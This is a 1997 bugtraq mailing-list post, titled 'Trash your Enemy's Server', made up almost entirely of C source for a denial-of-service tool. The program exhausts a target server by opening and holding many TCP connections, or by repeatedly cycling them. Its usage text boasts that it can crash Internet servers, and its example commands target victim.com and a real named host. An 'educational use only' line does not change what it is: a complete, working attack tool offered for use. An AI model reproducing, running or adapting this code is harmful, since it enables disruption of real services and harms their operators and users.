From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sat, 7 Jun 1997 07:41:21 +0800
To: bugtraq@netspace.org
Subject: Trash your Enemy's Server
Message-ID: <199706062334.SAA25668@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



/***************************************************************************/
/* con_dos.c -- Denial Of Service by opening many dangling TCP Connections */
/* Copyright(C) 1997 Ignoramus_Chewed-Off@algebra.com                      */
/***************************************************************************/

const char * Usage = 
"Error: %s\n"
"USAGE: %s (block|grind) hostname service# #connections\n"
"\n"
"This program opens #connections connections to the specified host.\n"
"It can be used to deny services, slow down and crash Internet servers.\n"
"\n"
"If #connections is set to 0, it opens as many connections as it can\n"
"and continues trying to do so as long as it runs. Use Control-C to \n"
"interrupt it. NOTE that depending on your OS, it may hurt you too.\n"
"\n"
"If #connections is not 0, this program only opens #connections of them.\n"
"After that, if the first argument is 'block', it simply sleeps. If the\n"
"first argument is 'grind', it starts opening and closing connections\n"
"in a round robin manner every second.\n"
"\n"
"This program is for EDUCATIONAL USE ONLY. Please do not use it for\n"
"anything illegal. There is no warranty. Copyright(C) Ignoramus Chewed-Off.\n"
"\n"
"USE EXAMPLE: \n"
"	%s grind victim.com 80 1000\n"
"-- opens 1000 HTTP connections to victim.com and waits\n"
"	%s block www.agis.net 80 0\n"
"-- constantly attempts to open HTTP connections to www.agis.net\n"
;

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define USAGE( msg ) 	\
   fprintf( stderr, Usage, msg, argv[0], argv[0], argv[0] ), \
   exit( 1 )

/* after I open this many additional connections (for n_connections == 0),
   I wait for 1 second, just in case 
*/

#define MAX_CONN 50

typedef enum { CON_BLOCK, CON_GRIND } ConMode;

/* create a client socket connected to PORT on HOSTNAME */
int create_client_socket(char ** hostname, int port)
{
    struct sockaddr_in sa ;
    struct hostent *hp ;
    int a, s ;
    long addr ;


    bzero(&sa, sizeof(sa)) ;
    if ((addr = inet_addr(*hostname)) != -1) {
        /* is Internet addr in octet notation */
        bcopy(&addr, (char *) &sa.sin_addr, sizeof(addr)) ; /* set address */
        sa.sin_family = AF_INET ;
    } else {
        /* do we know the host's address? */
        if ((hp = gethostbyname(*hostname)) == NULL) {
            return -2 ;
        }
        *hostname = hp->h_name ;
        bcopy(hp->h_addr, (char *) &sa.sin_addr, hp->h_length) ;
        sa.sin_family = hp->h_addrtype ;
    }

    sa.sin_port = htons((u_short) port) ;

    if ((s = socket(sa.sin_family, SOCK_STREAM, 0)) < 0) { /* get socket */
        return -1 ;
    }
    if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {  /* connect */
        close(s) ;
        return -1 ;
    }
    return s ;
}

int main( int argc, char *argv[] ) 
{
  char * name;
  int port, n_connections;
  int s;
  ConMode mode; 


  if( argc != 5
      || (argc >= 1 && (!strcmp( argv[1], "--help" ) 
                        || !strcmp( argv[1], "-help" ))))
    {
      USAGE( "Wrong Number of Arguments" );
    }

  if( !strcmp( argv[1], "block" ) )
    {
      mode = CON_BLOCK; 
    }
  else if( !strcmp( argv[1], "grind" ) )
    {
      mode = CON_GRIND;
    }
  else
    {
      USAGE( "First argument must be 'block' or 'grind'" );
    }

  name = argv[2];

  if( (port = atoi( argv[3] ) ) == 0 )
    {
      USAGE( "Port Number must be numeric" );
    }

  if( !isdigit( argv[4][0] ) )
    {
      USAGE( "Port Number must be numeric" );;
    }

  n_connections = atoi( argv[4] );

  if( n_connections == 0 ) /* infinite loop */
    {
      int i = 0;
      printf( "ATTENTION: This may damage even your "
               "computer. Press ^C to abort\n" );

      while( 1 )
        {
          if( create_client_socket( &name, port ) == -1 )
            {
              printf( "Connection refused; sleeping.\n" );
              sleep( 1 );
            }
          else
            {
              if( (i++ % MAX_CONN) == (MAX_CONN-1) )
                {
                  printf( "You can interrupt me here. I have %d "
                          "connections open. \nContinuing...\n", i );
                  sleep( 1 );
                }
            }
        }
    }
  else
    {
      int * fds = (int *)calloc( n_connections, sizeof( int ) );
      int i = 0;

      if( fds == 0 )
        USAGE( "Memory Allocation Error" ); 

      while( 1 ) /* in a loop, keep opening descriptors */
        {
          if( fds[i] != 0 )
            {
              printf( "Closing %d...\n", i );
              close( fds[i] );
              sleep( 1 );
            }

          while( 1 ) /* try to open the new one */
            {
              if( (fds[i] = create_client_socket( &name, port )) == -1 )
                {
                  printf( "Connection refused; sleeping.\n" );
                  sleep( 1 );
                }
              else
                {
                  printf( "Opened %d.\n", i );
                  break;
                }
            }

          i++;

          if( i == n_connections ) /* we've gone full circle */
            {
              printf( "Done with %d connections\n", i );

              if( mode == CON_BLOCK )
                {
                  printf( "I am going to sleep forever...\n", i );
                  while( 1 ) 
                    sleep(1);
                }
              else /* repeating the loop */
                i = 0;
            }
        }
    }
}